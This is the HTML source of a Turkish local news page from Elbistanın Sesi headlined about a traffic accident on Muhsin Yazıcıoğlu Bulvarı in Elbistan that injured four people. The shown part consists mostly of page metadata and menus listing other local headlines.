  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="Elbistan&#039;da, Muhsin Yazıcıoğlu Bulvarı&#039;nda yaşanan trafik kazasında 4 kişi yaralandı." />
<meta name="keywords" content="" />
<meta name="news_keywords" content="">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" />
<meta property="og:description" content="Elbistan&#039;da, Muhsin Yazıcıoğlu Bulvarı&#039;nda yaşanan trafik kazasında 4 kişi yaralandı." />
  <meta property="og:image" content="https://www.elbistaninsesi.com/images/haberler/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" />
<meta name="twitter:domain" content="https://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" />
<meta name="twitter:description" content="Elbistan’da, Muhsin Yazıcıoğlu Bulvarı’nda yaşanan trafik kazasında 4 kişi yaralandı." />
<meta name="twitter:image:src" content="https://www.elbistaninsesi.com/images/haberler/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" /><link rel="alternate" href="https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="https://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html">
<link rel="amphtml" href="https://www.elbistaninsesi.com/amp/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html">
  <link rel="image_src" type="image/jpeg" href="https://www.elbistaninsesi.com/images/haberler/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" />
<meta itemprop="thumbnailUrl" content="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" />
<meta itemprop="articleSection" content="Güncel" name="section" />
<meta itemprop="dateCreated" content="2021-11-14T17:31:32+02:00" />
<meta itemprop="image" content="https://www.elbistaninsesi.com/images/haberler/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'https://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'https://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

<style>
.dikeyhaberler .haber {
    width: 197px;
}
.dikeyhaberler .haber img {
    width: 200px;
    height: 120px;
}
.row-fluid [class*="span"]:first-child {
    margin-left: 0;
}
.dikeyhaberler .haber:last-child {
    margin-left: 15px;
}
#syazar {
    background-color: #EFEEEE;
}
</style>    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">10.01</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">11.47</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">600.84</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">1,638.50</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" title="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" >Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistanspordan-4-gollu-galibiyet-h71883.html" title="Elbistanspor’dan 4 gollü galibiyet" >Elbistanspor’dan 4 gollü galibiyet</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/rabia-taskin-saglikli-beslenme-ve-diyet-danismanligi-merkezi-h71878.html" title="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı" >Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/eski-tedas-binasi-millet-konagi-oluyor-h71877.html" title="Eski TEDAŞ binası ‘Millet Konağı’ oluyor" >Eski TEDAŞ binası ‘Millet Konağı’ oluyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-uzakdogu-sporlarina-ozel-destek-h71876.html" title="Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek" >Elbistan Belediyesi’nden Uzakdoğu sporlarına özel destek</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/camilerde-normal-saf-duzenine-geciliyor-h71873.html" title="Camilerde normal saf düzenine geçiliyor" >Camilerde normal saf düzenine geçiliyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/bos-kalan-kadrolara-yeniden-atama-yapilacak-h71872.html" title="Boş kalan kadrolara yeniden atama yapılacak" >Boş kalan kadrolara yeniden atama yapılacak</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/ciftci-kuraklik-destegi-odemelerini-bekliyor-h71871.html" title="Çiftçi kuraklık desteği ödemelerini bekliyor" >Çiftçi kuraklık desteği ödemelerini bekliyor</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/atilladan-akciger-kanseri-bilgilendirmesi-h71870.html" title="Atilla’dan akciğer kanseri bilgilendirmesi" >Atilla’dan akciğer kanseri bilgilendirmesi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistanda-bi-hareketine-bakar-hayat-uygulamasi-yapildi-h71868.html" title="Elbistan’da &#039;Bi Hareketine Bakar Hayat&#039; uygulaması yapıldı" >Elbistan’da &#039;Bi Hareketine Bakar Hayat&#039; uygulaması yapıldı</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="https://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="d936ded660959d68894ec726d89ffd7eef71fa0b" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="https://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="https://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="https://www.elbistaninsesi.com/vefatlar" id="k7"    >Vefatlar</a>
<a title="Güncel" href="https://www.elbistaninsesi.com/guncel" id="k8" class="current"   >Güncel</a>
<a title="Politika" href="https://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="https://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="https://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="https://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="https://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="https://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="https://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="https://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="https://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="https://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="https://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="https://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="https://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="https://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="https://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="https://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/mahmut-erten-39-yasinda-h71882.html" title="Mahmut Erten 39 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/mahmut_erten_39_yasinda_h71882_64295.jpg" alt="Mahmut Erten 39 yaşında" />
Mahmut Erten 39 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/emis-aslan-61-yasinda-h71881.html" title="Emiş Aslan 61 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/emis_aslan_61_yasinda_h71881_d4384.jpg" alt="Emiş Aslan 61 yaşında" />
Emiş Aslan 61 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ali-tatar-21-yasinda-h71880.html" title="Mehmet Ali Tatar 21 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/mehmet_ali_tatar_21_yasinda_h71880_c8d9f.jpg" alt="Mehmet Ali Tatar 21 yaşında" />
Mehmet Ali Tatar 21 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/suleyman-bilen-h71879.html" title="Süleyman Bilen"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/suleyman_bilen_h71879_7a247.jpg" alt="Süleyman Bilen" />
Süleyman Bilen</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/muhsin-yazicioglu-bulvarinda-kaza-4-yarali-h71884.html" title="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/muhsin_yazicioglu_bulvarinda_kaza_4_yarali_h71884_869de.jpg" alt="Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı" />
Muhsin Yazıcıoğlu Bulvarı’nda kaza: 4 yaralı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/elbistanspordan-4-gollu-galibiyet-h71883.html" title="Elbistanspor’dan 4 gollü galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/elbistanspordan_4_gollu_galibiyet_h71883_c4c66.jpg" alt="Elbistanspor’dan 4 gollü galibiyet" />
Elbistanspor’dan 4 gollü galibiyet</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/rabia-taskin-saglikli-beslenme-ve-diyet-danismanligi-merkezi-h71878.html" title="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/rabia_taskin_saglikli_beslenme_ve_diyet_danismanligi_merkezi_acildi_h71878_771e9.jpeg" alt="Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı" />
Rabia Taşkın Sağlıklı Beslenme ve Diyet Danışmanlığı Merkezi açıldı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/eski-tedas-binasi-millet-konagi-oluyor-h71877.html" title="Eski TEDAŞ binası ‘Millet Konağı’ oluyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/11/eski_tedas_binasi_millet_konagi_oluyor_h71877_2a67c.JPG" alt="Eski TEDAŞ binası ‘Millet Konağı’ oluyor" />
Eski TEDAŞ binası ‘Millet Konağı’ oluyor</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
